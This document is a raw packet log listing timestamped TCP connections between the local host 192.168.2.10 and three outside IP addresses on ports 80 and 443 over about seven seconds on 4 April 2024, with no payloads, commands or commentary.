Apr 4, 2024 17:48:56.311391115 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311402082 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311420918 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311438084 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311489105 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311703920 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311753035 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311806917 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311820030 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.311868906 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.311934948 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312071085 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312119961 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312191963 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312350988 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312364101 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312396049 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312443972 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312455893 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312503099 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312661886 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312674999 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312688112 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312746048 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312746048 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312819004 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312830925 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.312869072 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.312947989 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313097954 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313110113 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313152075 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313213110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313225031 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313271046 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313317060 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313328981 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313359976 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313442945 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313456059 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313519955 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313616037 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313627005 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313667059 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313692093 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313739061 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313827038 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313839912 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313875914 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.313952923 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.313966036 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314028978 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314055920 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314203024 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314214945 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314240932 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314327955 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314445019 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314449072 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314461946 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314543009 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314569950 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314588070 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314654112 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314681053 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314693928 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.314743996 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.314836025 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315021992 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315033913 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315079927 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315083981 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315124035 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315237045 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315249920 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315309048 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315310955 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315464973 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315481901 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315527916 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315588951 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315601110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315654993 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315695047 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315709114 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315747976 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315820932 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315833092 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315879107 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.315915108 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315926075 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.315956116 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316041946 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316092968 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316180944 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316318989 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316364050 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316478968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316492081 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316533089 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316577911 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316591024 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316628933 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316710949 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316725969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316756010 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.316838980 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.316970110 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317059040 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.317073107 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317312002 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317347050 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317358971 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317363977 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.317398071 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.317583084 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317708969 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317750931 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.317837954 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317852020 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317900896 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.317909956 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318078995 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318149090 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318221092 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318233967 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318276882 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318294048 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318481922 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318520069 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318595886 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318631887 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318644047 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318746090 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318840027 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318896055 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.318937063 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.318950891 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.319051981 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.319159031 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.319241047 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.319291115 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.324693918 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467279911 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467343092 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467384100 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467396021 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467461109 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467509985 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467573881 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467739105 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467752934 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467767000 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467792988 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467839003 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467843056 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467900038 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467914104 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467953920 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.467981100 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.467995882 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468008995 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468038082 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468050003 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468079090 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468089104 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468096018 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468130112 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468167067 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468211889 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468239069 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468355894 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468410015 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468446970 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468569994 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468611002 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468738079 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468839884 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.468880892 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.468950987 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469093084 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469135046 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.469208956 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469357014 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469399929 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.469441891 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469568968 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469613075 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.469702959 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469827890 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.469883919 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.469960928 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470096111 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470108986 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470148087 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.470207930 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470312119 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470330000 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.470618963 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470633984 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470710993 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.470730066 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470796108 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.470876932 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470890999 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.470932961 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.471164942 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.471257925 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.471402884 CEST	49717	80	192.168.2.10	190.249.187.165
Apr 4, 2024 17:48:56.641160011 CEST	80	49717	190.249.187.165	192.168.2.10
Apr 4, 2024 17:48:56.726167917 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.003146887 CEST	80	49718	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.003237963 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.003393888 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.003412962 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.280196905 CEST	80	49718	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.314788103 CEST	80	49718	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.314948082 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.315165043 CEST	49718	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.322388887 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.592000961 CEST	80	49718	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.606645107 CEST	80	49719	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.606759071 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.606947899 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.606967926 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.891274929 CEST	80	49719	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.905314922 CEST	80	49719	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:57.905394077 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.905601978 CEST	49719	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:57.908269882 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.189914942 CEST	80	49719	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.190494061 CEST	80	49720	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.190567017 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.190802097 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.190817118 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.474667072 CEST	80	49720	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.538686991 CEST	80	49720	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.538758039 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.538929939 CEST	49720	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.542121887 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.820784092 CEST	80	49721	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.821156025 CEST	80	49720	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:58.821286917 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.821523905 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:58.821523905 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.058444023 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.058487892 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.058607101 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.071161985 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.071186066 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.100117922 CEST	80	49721	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.115328074 CEST	80	49721	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.115343094 CEST	80	49721	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.115417004 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.115598917 CEST	49721	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.118499994 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.337641954 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.337762117 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.394470930 CEST	80	49721	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.400682926 CEST	80	49723	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.400770903 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.405956984 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.405987978 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.471606016 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.471626997 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.472018957 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.472126961 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.474808931 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.520236969 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.687948942 CEST	80	49723	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.701446056 CEST	80	49723	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.701471090 CEST	80	49723	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.701514959 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.701585054 CEST	49723	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.710716963 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.948429108 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.948545933 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.948561907 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.948591948 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.948616028 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.948676109 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.957417965 CEST	49722	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:48:59.957443953 CEST	443	49722	104.21.65.24	192.168.2.10
Apr 4, 2024 17:48:59.983578920 CEST	80	49723	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.992837906 CEST	80	49724	193.106.175.76	192.168.2.10
Apr 4, 2024 17:48:59.992937088 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.993120909 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:48:59.993120909 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.275211096 CEST	80	49724	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.288186073 CEST	80	49724	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.288237095 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.296788931 CEST	49724	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.299812078 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.579782963 CEST	80	49724	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.581805944 CEST	80	49725	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.581895113 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.584096909 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.584120035 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.864783049 CEST	80	49725	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.877003908 CEST	80	49725	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:00.877178907 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.877324104 CEST	49725	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:00.880703926 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.157656908 CEST	80	49725	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.163830042 CEST	80	49726	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.163943052 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.164132118 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.164160967 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.447040081 CEST	80	49726	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.489068031 CEST	80	49726	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.490173101 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.490257978 CEST	49726	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.499751091 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.773634911 CEST	80	49726	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.778904915 CEST	80	49727	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:01.780397892 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.780769110 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:01.780833960 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:02.065474033 CEST	80	49727	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:02.079312086 CEST	80	49727	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:02.079328060 CEST	80	49727	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:02.079404116 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:02.079576969 CEST	49727	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:02.359417915 CEST	80	49727	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:02.747312069 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:02.747358084 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:02.747442961 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:02.760092974 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:02.760119915 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.021677971 CEST	443	49728	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:03.021799088 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.026088953 CEST	49728	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:03.026099920 CEST	443	49728	104.21.65.24	192.168.2.10
